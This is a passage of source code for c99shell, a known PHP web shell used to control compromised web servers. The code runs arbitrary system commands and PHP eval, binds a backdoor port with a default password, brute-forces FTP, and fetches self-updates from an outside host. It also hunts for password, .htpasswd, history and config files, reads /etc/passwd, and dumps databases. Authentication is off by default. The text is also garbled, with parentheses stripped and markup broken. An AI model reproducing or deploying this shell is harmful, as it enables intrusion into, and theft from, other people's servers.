$v {if strtoupper$k != "GLOBALS" {strips$arr["$k"];}}} else {$arr = stripslashes$arr;}}} strips$GLOBALS;} $_REQUEST = array_merge$_COOKIE,$_GET,$_POST; foreach$_REQUEST as $k=>$v {if !isset$$k {$$k = $v;}} $shver = "1.0 beta 21.05.2005"; //Current version //CONFIGURATION AND SETTINGS if !empty$unset_surl {setcookie"c99sh_surl"; $surl = "";} elseif !empty$set_surl {$surl = $set_surl; setcookie"c99sh_surl",$surl;} else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL } $surl_autofill_include = true; //If true then search variables with descriptors URLs and save it in SURL. if $surl_autofill_include and !$_REQUEST["c99sh_surl"] {$include = "&"; foreach explode"&",getenv"QUERY_STRING" as $v {$v = explode"=",$v; $name = urldecode$v[0]; $value = urldecode$v[1]; foreach array"http://","https://","ssl://","ftp://","" as $needle {if strpos$value,$needle === 0 {$includestr .= urlencode$name."=".urlencode$value."&";}}} if $_REQUEST["surl_autofill_include"] {$includestr .= "surl_autofill_include=1&";}} if empty$surl { $surl = "?".$includestr; //Self url } $surl = htmlspecialchars$surl; $timelimit = 60; //limit of execution this script seconds, 0 = unlimited. //Authentication $login = "c99"; //login //DON'T FORGOT ABOUT CHANGE PASSWORD!!! $pass = "c99"; //password $md5_pass = ""; //md5-cryped pass. if null, md5$pass /*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off authentification $host_allow = array"*"; //array "{mask}1","{mask}2",..., {mask} = IP or HOST e.g. array"192.168.0.*","127.0.0.1" $login_txt = "Restricted area"; //http-auth message. $accessdeniedmess = "c99shell v.".$shver.": access denied"; $autoupdate = false; //Automatic updating? $updatenow = false; //If true, update now $c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server $filestealth = false; //if true, don't change modify&access-time $donated_html = "
Owned by hacker
"; /* If you publish free shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array""; //array "act1","act2,"..., if $act is in this array, display $donated_html. $curdir = "./"; //start directory //$curdir = getenv"DOCUMENT_ROOT"; $tmpdir = ""; //Directory for tempory files. If empty, auto-fill /tmp or %WINDIR/temp $tmpdir_log = "./"; //Directory logs of long processes e.g. brute, scan... $log_email = "user@host.tld"; //Default e-mail for sending logs $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending $sort_save = true; //If true then save sorting-type. // Registered file-types. // array // "{action1}"=>array"ext1","ext2","ext3",..., // "{action2}"=>array"ext4","ext5","ext6",..., // ... // $ftypes = array "html"=>array"html","htm","shtml", "txt"=>array"txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess", "exe"=>array"sh","install","bat","cmd", "ini"=>array"ini","inf", "code"=>array"php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl", "img"=>array"gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg", "sdb"=>array"sdb", "phpsess"=>array"sess", "download"=>array"exe","com","pif","src","lnk","zip","rar","gz","tar" ; // Registered executable file-types. // array // string "command{i}"=>array"ext1","ext2","ext3",..., // ... // // {command}: %f% = filename $exeftypes = array getenv"PHPRC"." %f%"=>array"php","php3","php4", ; /* Highlighted files. array i=>array{regexp},{type},{opentag},{closetag},{break} ... string {regexp} - regular exp. int {type}: 0 - files and folders as default, 1 - files only, 2 - folders only string {opentag} - open html-tag, e.g. "" default string {closetag} - close html-tag, e.g. "" default bool {break} - if true and found match then break */ $regxp_highlight = array arraybasename$_SERVER["PHP_SELF"],1,"","", // example array"config.php",1 // example ; $safemode_diskettes = array"a"; // This variable for disabling diskett-errors. // array i=>{letter} ...; string {letter} - letter of a drive // Set as false or for turn off. $hexdump_lines = 8; // lines in hex preview file $hexdump_rows = 24; // 16, 24 or 32 bytes in one line $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = "c99"; // default password for binding $bindport_port = "11457"; // default port for binding // Command-aliases if !$win { $cmdaliases = array array"-----------------------------------------------------------", "ls -la", array"find all suid files", "find / -type f -perm -04000 -ls", array"find suid files in current dir", "find . -type f -perm -04000 -ls", array"find all sgid files", "find / -type f -perm -02000 -ls", array"find sgid files in current dir", "find . -type f -perm -02000 -ls", array"find config.inc.php files", "find / -type f -name config.inc.php", array"find config* files", "find / -type f -name "config*"", array"find config* files in current dir", "find . -type f -name "config*"", array"find all writable directories and files", "find / -perm -2 -ls", array"find all writable directories and files in current dir", "find . -perm -2 -ls", array"find all service.pwd files", "find / -type f -name service.pwd", array"find service.pwd files in current dir", "find . -type f -name service.pwd", array"find all .htpasswd files", "find / -type f -name .htpasswd", array"find .htpasswd files in current dir", "find . -type f -name .htpasswd", array"find all .bash_history files", "find / -type f -name .bash_history", array"find .bash_history files in current dir", "find . -type f -name .bash_history", array"find all .fetchmailrc files", "find / -type f -name .fetchmailrc", array"find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc", array"list file attributes on a Linux second extended file system", "lsattr -va", array"show opened ports", "netstat -an | grep -i listen" ; } else { $cmdaliases = array array"-----------------------------------------------------------", "dir", array"show opened ports", "netstat -an" ; } $sess_cookie = "c99shvars"; // Cookie-variable name $usefsbuff = true; //Buffer-function $copy_unset = false; //Remove copied files from buffer after pasting //Quick launch $quicklaunch = array array"",$surl, array"","#" onclick="history.back1", array"","#" onclick="history.go1", array"",$surl."act=ls&d=%upd&sort=%sort", array"","", array"",$surl."act=search&d=%d", array"",$surl."act=fsbuff&d=%d", array"Encoder",$surl."act=encoder&d=%d", array"Bind",$surl."act=bind&d=%d", array"Proc.",$surl."act=ps_aux&d=%d", array"FTP brute",$surl."act=ftpquickbrute&d=%d", array"Sec.",$surl."act=security&d=%d", array"SQL",$surl."act=sql&d=%d", array"PHP-code",$surl."act=eval&d=%d", array"Feedback",$surl."act=feedback&d=%d", array"Self remove",$surl."act=selfremove", array"Logout","#" onclick="if confirm'Are you sure?' window.close" ; //Highlight-code colors $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract$_REQUEST["c99shcook"]; //END CONFIGURATION // / Next code isn't for editing / $tmp = array; foreach$host_allow as $k=>$v {$tmp[] = str_replace"*",".*",preg_quote$v;} $s = "!^".implode"|",$tmp."$!i"; if !preg_match$s,getenv"REMOTE_ADDR" and !preg_match$s,gethostbyaddrgetenv"REMOTE_ADDR" {exit"c99shell: Access Denied - your host ".getenv"REMOTE_ADDR"." not allow";} if $login { ifempty$md5_pass {$md5_pass = md5$pass;} if $_SERVER["PHP_AUTH_USER"] != $login or md5$_SERVER["PHP_AUTH_PW"] != $md5_pass { if $login_txt === false {$login_txt = "";} elseif empty$login_txt {$login_txt = strip_tagsereg_replace" |
"," ",$donated_html;} header"WWW-Authenticate: Basic realm="c99shell ".$shver.": ".$login_txt."""; header"HTTP/1.0 401 Unauthorized"; exit$accessdeniedmess; } } if $act != "img" { $lastdir = realpath"."; chdir$curdir; if $selfwrite or $updatenow { if $selfwrite == "1" {$selfwrite = "c99shell.php";} c99sh_getupdate; $data = file_get_contents$c99sh_updatefurl; $fp = fopen$data,"w"; fwrite$fp,$data; fclose$fp; exit; } $sess_data = unserialize$_COOKIE["$sess_cookie"]; if !is_array$sess_data {$sess_data = array;} if !is_array$sess_data["copy"] {$sess_data["copy"] = array;} if !is_array$sess_data["cut"] {$sess_data["cut"] = array;} if !function_exists"c99_buff_prepare" { function c99_buff_prepare { global $sess_data; global $act; foreach$sess_data["copy"] as $k=>$v {$sess_data["copy"][$k] = str_replace"",DIRECTORY_SEPARATOR,realpath$v;} foreach$sess_data["cut"] as $k=>$v {$sess_data["cut"][$k] = str_replace"",DIRECTORY_SEPARATOR,realpath$v;} $sess_data["copy"] = array_unique$sess_data["copy"]; $sess_data["cut"] = array_unique$sess_data["cut"]; sort$sess_data["copy"]; sort$sess_data["cut"]; if $act != "copy" {foreach$sess_data["cut"] as $k=>$v {if $sess_data["copy"][$k] == $v {unset$sess_data["copy"][$k]; }}} else {foreach$sess_data["copy"] as $k=>$v {if $sess_data["cut"][$k] == $v {unset$sess_data["cut"][$k];}}} } } c99_buff_prepare; if !function_exists"c99_sess_put" { function c99_sess_put$data { global $sess_cookie; global $sess_data; c99_buff_prepare; $sess_data = $data; $data = serialize$data; setcookie$sess_cookie,$data; } } if $sort_save { if !empty$sort {setcookie"sort",$sort;} if !empty$sql_sort {setcookie"sql_sort",$sql_sort;} } if !function_exists"str2mini" { function str2mini$content,$len { if strlen$content > $len { $len = ceil$len/2 - 2; return substr$content, 0, $len."...".substr$content, -$len; } else {return $content;} } } if !function_exists"view_size" { function view_size$size { if !is_numeric$size {return false;} else { if $size >= 1073741824 {$size = round$size/1073741824*100/100 ." GB";} elseif $size >= 1048576 {$size = round$size/1048576*100/100 ." MB";} elseif $size >= 1024 {$size = round$size/1024*100/100 ." KB";} else {$size = $size . " B";} return $size; } } } if !function_exists"fs_copy_dir" { function fs_copy_dir$d,$t { $d = str_replace"",DIRECTORY_SEPARATOR,$d; if substr$d,-1,1 != DIRECTORY_SEPARATOR {$d .= DIRECTORY_SEPARATOR;} $h = opendir$d; while $o = readdir$h !== false { if $o != "." and $o != ".." { if !is_dir$d.DIRECTORY_SEPARATOR.$o {$ret = copy$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o;} else {$ret = mkdir$t.DIRECTORY_SEPARATOR.$o; fs_copy_dir$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o;} if !$ret {return $ret;} } } closedir$h; return true; } } if !function_exists"fs_copy_obj" { function fs_copy_obj$d,$t { $d = str_replace"",DIRECTORY_SEPARATOR,$d; $t = str_replace"",DIRECTORY_SEPARATOR,$t; if !is_dirdirname$t {mkdirdirname$t;} if is_dir$d { if substr$d,-1,1 != DIRECTORY_SEPARATOR {$d .= DIRECTORY_SEPARATOR;} if substr$t,-1,1 != DIRECTORY_SEPARATOR {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir$d,$t; } elseif is_file$d {return copy$d,$t;} else {return false;} } } if !function_exists"fs_move_dir" { function fs_move_dir$d,$t { $h = opendir$d; if !is_dir$t {mkdir$t;} while $o = readdir$h !== false { if $o != "." and $o != ".." { $ret = true; if !is_dir$d.DIRECTORY_SEPARATOR.$o {$ret = copy$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o;} else {if mkdir$t.DIRECTORY_SEPARATOR.$o and fs_copy_dir$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o {$ret = false;}} if !$ret {return $ret;} } } closedir$h; return true; } } if !function_exists"fs_move_obj" { function fs_move_obj$d,$t { $d = str_replace"",DIRECTORY_SEPARATOR,$d; $t = str_replace"",DIRECTORY_SEPARATOR,$t; if is_dir$d { if substr$d,-1,1 != DIRECTORY_SEPARATOR {$d .= DIRECTORY_SEPARATOR;} if substr$t,-1,1 != DIRECTORY_SEPARATOR {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir$d,$t; } elseif is_file$d { ifcopy$d,$t {return unlink$d;} else {unlink$t; return false;} } else {return false;} } } if !function_exists"fs_rmdir" { function fs_rmdir$d { $h = opendir$d; while $o = readdir$h !== false { if $o != "." and $o != ".." { if !is_dir$d.$o {unlink$d.$o;} else {fs_rmdir$d.$o.DIRECTORY_SEPARATOR; rmdir$d.$o;} } } closedir$h; rmdir$d; return !is_dir$d; } } if !function_exists"fs_rmobj" { function fs_rmobj$o { $o = str_replace"",DIRECTORY_SEPARATOR,$o; if is_dir$o { if substr$o,-1,1 != DIRECTORY_SEPARATOR {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir$o; } elseif is_file$o {return unlink$o;} else {return false;} } } if !function_exists"myshellexec" { function myshellexec$cmd { $result = ""; if !empty$cmd { if is_callable"exec" {exec$cmd,$result; $result = join"n",$result;} elseif is_callable"shell_exec" {$result = shell_exec$cmd;} elseif is_callable"system" {@ob_start; system$cmd; $result = @ob_get_contents; @ob_end_clean;} elseif is_callable"passthru" {@ob_start; passthru$cmd; $result = @ob_get_contents; @ob_end_clean;} elseif $result = `$cmd` !== false {} elseif is_resource$fp = popen$cmd,"r" { $result = ""; while!feof$fp {$result .= fread$fp,1024;} pclose$fp; } } return $result; } } if !function_exists"tabsort" { function tabsort$a,$b {global $v; return strnatcmp$a[$v], $b[$v];} } if !function_exists"view_perms" { function view_perms$mode { if $mode & 0xC000 === 0xC000 {$type = "s";} elseif $mode & 0x4000 === 0x4000 {$type = "d";} elseif $mode & 0xA000 === 0xA000 {$type = "l";} elseif $mode & 0x8000 === 0x8000 {$type = "-";} elseif $mode & 0x6000 === 0x6000 {$type = "b";} elseif $mode & 0x2000 === 0x2000 {$type = "c";} elseif $mode & 0x1000 === 0x1000 {$type = "p";} else {$type = "?";} $owner["read"] = $mode & 00400 ? "r" : "-"; $owner["write"] = $mode & 00200 ? "w" : "-"; $owner["execute"] = $mode & 00100 ? "x" : "-"; $group["read"] = $mode & 00040 ? "r" : "-"; $group["write"] = $mode & 00020 ? "w" : "-"; $group["execute"] = $mode & 00010 ? "x" : "-"; $world["read"] = $mode & 00004 ? "r" : "-"; $world["write"] = $mode & 00002 ? "w" : "-"; $world["execute"] = $mode & 00001 ? "x" : "-"; if $mode & 0x800 {$owner["execute"] = $owner["execute"] == "x" ? "s" : "S";} if $mode & 0x400 {$group["execute"] = $group["execute"] == "x" ? "s" : "S";} if $mode & 0x200 {$world["execute"] = $world["execute"] == "x" ? "t" : "T";} return $type.$owner["read"].$owner["write"].$owner["execute"]. $group["read"].$group["write"].$group["execute"]. $world["read"].$world["write"].$world["execute"]; } } if !function_exists"parse_perms" { function parse_perms$mode { if $mode & 0xC000 === 0xC000 {$t = "s";} elseif $mode & 0x4000 === 0x4000 {$t = "d";} elseif $mode & 0xA000 === 0xA000 {$t = "l";} elseif $mode & 0x8000 === 0x8000 {$t = "-";} elseif $mode & 0x6000 === 0x6000 {$t = "b";} elseif $mode & 0x2000 === 0x2000 {$t = "c";} elseif $mode & 0x1000 === 0x1000 {$t = "p";} else {$t = "?";} $o["r"] = $mode & 00400 > 0; $o["w"] = $mode & 00200 > 0; $o["x"] = $mode & 00100 > 0; $g["r"] = $mode & 00040 > 0; $g["w"] = $mode & 00020 > 0; $g["x"] = $mode & 00010 > 0; $w["r"] = $mode & 00004 > 0; $w["w"] = $mode & 00002 > 0; $w["x"] = $mode & 00001 > 0; return array"t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w; } } if !function_exists"view_perms_color" { function view_perms_color$o { if !is_readable$o {return "".view_permsfileperms$o."";} elseif !is_writable$o {return "".view_permsfileperms$o."";} else {return "".view_permsfileperms$o."";} } } if !function_exists"gchds" {function gchds$a,$b,$c,$d="" {if $a == $b {return $c;} else {return $d;}}} if !function_exists"c99sh_getupdate" { function c99sh_getupdate { global $updatenow; $data = @file_get_contents$c99sh_updatefurl."?version=".$shver."&"; if !$data {echo "Can't fetch update-information!";} else { $data = unserializebase64_decode$data; if !is_array$data {echo "Corrupted update-information!";} elseif $shver < $data["cur"] {$updatenow = true;} } } } if !function_exists"mysql_dump" { function mysql_dump$set { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array; $ret["err"] = array; if !is_resource$sock {echo"Error: $sock is not valid resource.";} if empty$db {$db = "db";} if empty$print {$print = 0;} if empty$nl2br {$nl2br = 0;} if empty$add_drop {$add_drop = true;} if empty$file { global $win; if $win {$file = "C:tmpdump_".$SERVER_NAME."_".$db."_".date"d-m-Y-H-i-s".".sql";} else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date"d-m-Y-H-i-s".".sql";} } if !is_array$tabs {$tabs = array;} if empty$add_drop {$add_drop = true;} if sizeof$tabs == 0 { // retrive tables-list $res = mysql_query"SHOW TABLES FROM ".$db, $sock; if mysql_num_rows$res > 0 {while $row = mysql_fetch_row$res {$tabs[] = $row[0];}} } $SERVER_ADDR = getenv"SERVER_ADDR"; $SERVER_NAME = getenv"SERVER_NAME"; $out = "# Dumped by C99Shell.SQL v. ".$shver." # Home page: http://ccteam.ru # # Host settings: # MySQL version: ".mysql_get_server_info." running on ".$SERVER_ADDR." ".$SERVER_NAME.""." # Date: ".date"d.m.Y H:i:s"." # ".gethostbyname$SERVER_ADDR." ".$SERVER_ADDR.""." dump db "".$db."" #--------------------------------------------------------- "; $c = count$onlytabs; foreach$tabs as $tab { if in_array$tab,$onlytabs or !$c { if $add_drop {$out .= "DROP TABLE IF EXISTS `".$tab."`;n";} // recieve query for create table structure $res = mysql_query"SHOW CREATE TABLE `".$tab."`", $sock; if !$res {$ret["err"][] = mysql_smarterror;} else { $row = mysql_fetch_row$res; $out .= $row["1"].";nn"; // recieve table variables $res = mysql_query"SELECT * FROM `$tab`", $sock; if mysql_num_rows$res > 0 { while $row = mysql_fetch_assoc$res { $keys = implode"`, `", array_keys$row; $values = array_values$row; foreach$values as $k=>$v {$values[$k] = addslashes$v;} $values = implode"', '", $values; $sql = "INSERT INTO `$tab``".$keys."` VALUES '".$values."';n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------nn"; if $file { $fp = fopen$file, "w"; if !$fp {$ret["err"][] = 2;} else { fwrite $fp, $out; fclose $fp; } } if $print {if $nl2br {echo nl2br$out;} else {echo $out;}} return $out; } } if !function_exists"mysql_buildwhere" { function mysql_buildwhere$array,$sep=" and",$functs=array { if !is_array$array {$array = array;} $result = ""; foreach$array as $k=>$v { $value = ""; if !empty$functs[$k] {$value .= $functs[$k]."";} $value .= "'".addslashes$v."'"; if !empty$functs[$k] {$value .= "";} $result .= "`".$k."` = ".$value.$sep; } $result = substr$result,0,strlen$result-strlen$sep; return $result; } } if !function_exists"mysql_fetch_all" { function mysql_fetch_all$query,$sock { if $sock {$result = mysql_query$query,$sock;} else {$result = mysql_query$query;} $array = array; while $row = mysql_fetch_array$result {$array[] = $row;} mysql_free_result$result; return $array; } } if !function_exists"mysql_smarterror" { function mysql_smarterror$type,$sock { if $sock {$error = mysql_error$sock;} else {$error = mysql_error;} $error = htmlspecialchars$error; return $error; } } if !function_exists"mysql_query_form" { function mysql_query_form { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if $submit and !$sql_query_result and $sql_confirm {if !$sql_query_error {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";} if $sql_query_result or !$sql_confirm {$sql_act = $sql_goto;} if !$submit or $sql_act { echo ""; if $tbl_struct { echo "
"; if $sql_query and !$submit {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



 
Fields:
"; foreach $tbl_struct as $field {$name = $field["Field"]; echo " ".$name."
";} echo "
"; } } if $sql_query_result or !$sql_confirm {$sql_query = $sql_last_query;} } } if !function_exists"mysql_create_db" { function mysql_create_db$db,$sock="" { $sql = "CREATE DATABASE `".addslashes$db."`;"; if $sock {return mysql_query$sql,$sock;} else {return mysql_query$sql;} } } if !function_exists"mysql_query_parse" { function mysql_query_parse$query { $query = trim$query; $arr = explode " ",$query; /*array array { "METHOD"=>arrayoutput_type, "METHOD1"... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array "SELECT"=>array3,1, "SHOW"=>array2,1, "DELETE"=>array1, "DROP"=>array1 ; $result = array; $op = strtoupper$arr[0]; if is_array$types[$op] { $result["propertions"] = $types[$op]; $result["query"] = $query; if $types[$op] == 2 { foreach$arr as $k=>$v { if strtoupper$v == "LIMIT" { $result["limit"] = $arr[$k+1]; $result["limit"] = explode",",$result["limit"]; if count$result["limit"] == 1 {$result["limit"] = array0,$result["limit"][0];} unset$arr[$k],$arr[$k+1]; } } } } else {return false;} } } if !function_exists"c99fsearch" { function c99fsearch$d { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if substr$d,-1,1 != DIRECTORY_SEPARATOR {$d .= DIRECTORY_SEPARATOR;} $h = opendir$d; while $f = readdir$h !== false { if$f != "." && $f != ".." { $bool = empty$a["name_regexp"] and strpos$f,$a["name"] !== false || $a["name_regexp"] and ereg$a["name"],$f; if is_dir$d.$f { $search_i_d++; if empty$a["text"] and $bool {$found[] = $d.$f; $found_d++;} if !is_link$d.$f {c99fsearch$d.$f;} } else { $search_i_f++; if $bool { if !empty$a["text"] { $r = @file_get_contents$d.$f; if $a["text_wwo"] {$a["text"] = " ".trim$a["text"]." ";} if !$a["text_cs"] {$a["text"] = strtolower$a["text"]; $r = strtolower$r;} if $a["text_regexp"] {$bool = ereg$a["text"],$r;} else {$bool = strpos" ".$r,$a["text"],1;} if $a["text_not"] {$bool = !$bool;} if $bool {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir$h; } } if $act == "gofile" {if is_dir$f {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname$f; $f = basename$f;}} //Sending headers header"Expires: Mon, 26 Jul 1997 05:00:00 GMT"; header"Last-Modified: ".gmdate"D, d M Y H:i:s"." GMT"; header"Cache-Control: no-store, no-cache, must-revalidate"; header"Cache-Control: post-check=0, pre-check=0", false; header"Pragma: no-cache"; if empty$tmpdir { if !$win {$tmpdir = "/tmp/";} else {$tmpdir = getenv"SystemRoot";} } else {$tmpdir = realpath$tmpdir;} $tmpdir = str_replace"",DIRECTORY_SEPARATOR,$tmpdir; if substr$tmpdir,-1,1 != DIRECTORY_SEPARATOR {$tmpdir .= DIRECTORY_SEPARATOR;} if empty$tmpdir_logs {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath$tmpdir_logs;} if @ini_get"safe_mode" or strtolower@ini_get"safe_mode" == "on" { $safemode = true; $hsafemode = "ON secure"; } else {$safemode = false; $hsafemode = "OFF not secure";} $v = @ini_get"open_basedir"; if $v or strtolower$v == "on" {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF not secure";} $sort = htmlspecialchars$sort; if empty$sort {$sort = $sort_default;} $sort[1] = strtolower$sort[1]; $DISP_SERVER_SOFTWARE = getenv"SERVER_SOFTWARE"; if !ereg"PHP/".phpversion,$DISP_SERVER_SOFTWARE {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion;} $DISP_SERVER_SOFTWARE = str_replace"PHP/".phpversion,"PHP/".phpversion."",htmlspecialchars$DISP_SERVER_SOFTWARE; @ini_set"highlight.bg",$highlight_bg; //FFFFFF @ini_set"highlight.comment",$highlight_comment; //#FF8000 @ini_set"highlight.default",$highlight_default; //#0000BB @ini_set"highlight.html",$highlight_html; //#000000 @ini_set"highlight.keyword",$highlight_keyword; //#007700 @ini_set"highlight.string",$highlight_string; //#DD0000 if !is_array$actbox {$actbox = array;} $dspact = $act = htmlspecialchars$act; $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode$d; ?> <?php echo getenv"HTTP_HOST"; ?> - c99shell

!C99Shell v. !

Software:   

uname -a:  ",1; ?> 

",1;} else {echo get_current_user;} ?> 

Safe-mode: 

".htmlspecialchars$b.DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if is_writable$d { $wd = true; $wdt = "[ ok ]"; echo "".view_permsfileperms$d.""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "".view_perms_color$d.""; } if is_callable"disk_free_space" { $free = disk_free_space$d; $total = disk_total_space$d; if $free === false {$free = 0;} if $total === false {$total = 0;} if $free < 0 {$free = 0;} if $total < 0 {$total = 0;} $used = $total-$free; $free_percent = round100/$total/$free,2; echo "
Free ".view_size$free." of ".view_size$total." ".$free_percent."%"; } echo "
"; $letters = ""; if $win { $v = explode"",$d; $v = $v[0]; foreach range"a","z" as $letter { $bool = $isdiskette = in_array$letter,$safemode_diskettes; if !$bool {$bool = is_dir$letter.":";} if $bool { $letters .= "[ "; if $letter.":" != $v {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } if !empty$letters {echo "Detected drives: ".$letters."
";} } if count$quicklaunch > 0 { foreach$quicklaunch as $item { $item[1] = str_replace"%d",urlencode$d,$item[1]; $item[1] = str_replace"%sort",$sort,$item[1]; $v = realpath$d.".."; if empty$v {$a = explodeDIRECTORY_SEPARATOR,$d; unset$a[count$a-2]; $v = joinDIRECTORY_SEPARATOR,$a;} $item[1] = str_replace"%upd",urlencode$v,$item[1]; echo "".$item[0]."    "; } } ?>



"; $line = explode" ",$line; $line[10] = join" ",array_slice$line,10,count$line; $line = array_slice$line,0,11; if $line[0] == get_current_user {$line[0] = "".$line[0]."";} $line[] = "KILL"; $prcs[] = $line; echo ""; } } $head[$k] = "".$head[$k]."".$y; $head[] = "ACTION"; $v = $ps_aux_sort[0]; usort$prcs,"tabsort"; if $ps_aux_sort[1] == "d" {$prcs = array_reverse$prcs;} $tab = array; $tab[] = $head; $tab = array_merge$tab,$prcs; echo "

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

"; if !$sql_sock {?>"; } echo "
SQL Manager:
"; if !$sql_sock { if !$sql_server {echo "NO CONNECTION";} else {echo "
Can't connect
"; echo "".$err."";} } else { $sqlquicklaunch = array; $sqlquicklaunch[] = array"Index",$surl."act=sql&sql_login=".htmlspecialchars$sql_login."&sql_passwd=".htmlspecialchars$sql_passwd."&sql_server=".htmlspecialchars$sql_server."&sql_port=".htmlspecialchars$sql_port."&"; $sqlquicklaunch[] = array"Query",$sql_surl."sql_act=query&sql_tbl=".urlencode$sql_tbl; $sqlquicklaunch[] = array"Server-status",$surl."act=sql&sql_login=".htmlspecialchars$sql_login."&sql_passwd=".htmlspecialchars$sql_passwd."&sql_server=".htmlspecialchars$sql_server."&sql_port=".htmlspecialchars$sql_port."&sql_act=serverstatus"; $sqlquicklaunch[] = array"Server variables",$surl."act=sql&sql_login=".htmlspecialchars$sql_login."&sql_passwd=".htmlspecialchars$sql_passwd."&sql_server=".htmlspecialchars$sql_server."&sql_port=".htmlspecialchars$sql_port."&sql_act=servervars"; $sqlquicklaunch[] = array"Processes",$surl."act=sql&sql_login=".htmlspecialchars$sql_login."&sql_passwd=".htmlspecialchars$sql_passwd."&sql_server=".htmlspecialchars$sql_server."&sql_port=".htmlspecialchars$sql_port."&sql_act=processes"; $sqlquicklaunch[] = array"Logout",$surl."act=sql"; echo "
MySQL ".mysql_get_server_info." proto v.".mysql_get_proto_info ." running in ".htmlspecialchars$sql_server.":".htmlspecialchars$sql_port." as ".htmlspecialchars$sql_login."@".htmlspecialchars$sql_server." password - "".htmlspecialchars$sql_passwd.""
"; if count$sqlquicklaunch > 0 {foreach$sqlquicklaunch as $item {echo "[ ".$item[0]." ] ";}} echo "
"; } echo "
i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 default
  •  Please, fill the form:
    Username Password  Database 
    Host PORT
    ">Home
    ".htmlspecialchars$sql_db." ]---
    "; $c = 0; while $row = mysql_fetch_array$result {$count = mysql_query "SELECT COUNT* FROM ".$row[0]; $count_row = mysql_fetch_array$count; echo " ".htmlspecialchars$row[0]." ".$count_row[0]."
    "; mysql_free_result$count; $c++;} if !$c {echo "No tables found in database.";} } } else { ?>
    Home

    Please, select database
    "; //Start center panel $diplay = true; if $sql_db { if !is_numeric$c {$c = 0;} if $c == 0 {$c = "no";} echo "
    There are ".$c." tables in this DB ".htmlspecialchars$sql_db.".
    "; if count$dbquicklaunch > 0 {foreach$dbsqlquicklaunch as $item {echo "[ ".$item[0]." ] ";}} echo "
    "; $acts = array"","dump"; if $sql_act == "tbldrop" {$sql_query = "DROP TABLE"; foreach$boxtbl as $v {$sql_query .= "n`".$v."` ,";} $sql_query = substr$sql_query,0,strlen$sql_query-1.";"; $sql_act = "query";} elseif $sql_act == "tblempty" {$sql_query = ""; foreach$boxtbl as $v {$sql_query .= "DELETE FROM `".$v."` n";} $sql_act = "query";} elseif $sql_act == "tbldump" {if count$boxtbl > 0 {$dmptbls = $boxtbl;} elseif$thistbl {$dmptbls = array$sql_tbl;} $sql_act = "dump";} elseif $sql_act == "tblcheck" {$sql_query = "CHECK TABLE"; foreach$boxtbl as $v {$sql_query .= "n`".$v."` ,";} $sql_query = substr$sql_query,0,strlen$sql_query-1.";"; $sql_act = "query";} elseif $sql_act == "tbloptimize" {$sql_query = "OPTIMIZE TABLE"; foreach$boxtbl as $v {$sql_query .= "n`".$v."` ,";} $sql_query = substr$sql_query,0,strlen$sql_query-1.";"; $sql_act = "query";} elseif $sql_act == "tblrepair" {$sql_query = "REPAIR TABLE"; foreach$boxtbl as $v {$sql_query .= "n`".$v."` ,";} $sql_query = substr$sql_query,0,strlen$sql_query-1.";"; $sql_act = "query";} elseif $sql_act == "tblanalyze" {$sql_query = "ANALYZE TABLE"; foreach$boxtbl as $v {$sql_query .= "n`".$v."` ,";} $sql_query = substr$sql_query,0,strlen$sql_query-1.";"; $sql_act = "query";} elseif $sql_act == "deleterow" {$sql_query = ""; if !empty$boxrow_all {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach$boxrow as $v {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;n";} $sql_query = substr$sql_query,0,strlen$sql_query-1;} $sql_act = "query";} elseif $sql_tbl_act == "insert" { if $sql_tbl_insert_radio == 1 { $keys = ""; $akeys = array_keys$sql_tbl_insert; foreach $akeys as $v {$keys .= "`".addslashes$v."`, ";} if !empty$keys {$keys = substr$keys,0,strlen$keys-2;} $values = ""; $i 